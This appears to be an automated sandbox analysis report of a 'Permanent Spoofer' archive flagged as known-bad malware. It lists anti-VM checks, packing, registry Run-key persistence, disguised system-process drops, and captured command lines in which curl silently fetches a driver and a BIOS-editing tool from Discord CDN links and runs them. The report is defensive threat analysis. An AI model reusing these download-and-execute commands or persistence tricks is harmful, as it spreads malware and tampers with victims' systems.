Analysis Overview
SHA256
18787f859db9b4df0cf089d0a8d3229847300b22ee1e5c6f2c1f34d2013b6cc6
Threat Level: Known bad
The file oh no.zip was found to be: Known bad.
Malicious Activity Summary
Modifies visiblity of hidden/system files in Explorer
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Obfuscated with Agile.Net obfuscator
Executes dropped EXE
Loads dropped DLL
Themida packer
Checks BIOS information in registry
Adds Run key to start application
Checks whether UAC is enabled
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Unsigned PE
Detects Pyinstaller
System Location Discovery: System Language Discovery
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-27 20:13
Signatures
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-09-27 20:10
Reported
2024-09-27 20:19
Platform
win10v2004-20240802-en
Max time kernel
127s
Max time network
148s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\amifldrv64.sys | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\AMIDEWINx64.EXE | C:\Windows\system32\curl.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\ = "URL:Run game 1086389167996547133 protocol" | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\URL Protocol | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\oh no\\Permanent Spoofer\\spoofer.exe" | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\shell\open\command | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\shell\open | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133 | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\shell | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\oh no\\Permanent Spoofer\\spoofer.exe" | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent
C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IVN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SU AUTO >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SF DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BLC DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CA DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CSK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PSN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PAT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PPN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 1 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 2 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 3 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 4 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 5 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 6 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 7 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 8 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 9 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 10 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 11 DHQX992121213-%RANDOM% >nul
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.210.23.2.in-addr.arpa | udp |
Files
C:\Windows\AMIDEWINx64.EXE
| MD5 | a1ca4bebcd03fafbe2b06a46a694e29a |
| SHA1 | ffc88125007c23ff6711147a12f9bba9c3d197ed |
| SHA256 | c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65 |
| SHA512 | 6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-27 20:10
Reported
2024-09-27 20:19
Platform
win7-20240903-en
Max time kernel
151s
Max time network
142s
Command Line
Signatures
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\svchost.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\spoolsv.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\themes\explorer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\spoolsv.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\svchost.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Resources\Themes\icsys.icn.exe | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| File opened for modification | \??\c:\windows\resources\themes\explorer.exe | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| File opened for modification | \??\c:\windows\resources\spoolsv.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | \??\c:\windows\resources\svchost.exe | \??\c:\windows\resources\spoolsv.exe | N/A |
| File opened for modification | C:\Windows\Resources\tjud.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\spoolsv.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\shell\open\command | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\shell\open | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\ = "URL:Run game 1086389167996547133 protocol" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\URL Protocol | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\DefaultIcon | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\DefaultIcon\ = "c:\\users\\admin\\appdata\\local\\temp\\oh no\\permanent spoofer\\spoofer.exe\u00a0" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\shell | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\shell\open\command\ = "c:\\users\\admin\\appdata\\local\\temp\\oh no\\permanent spoofer\\spoofer.exe\u00a0" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133 | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
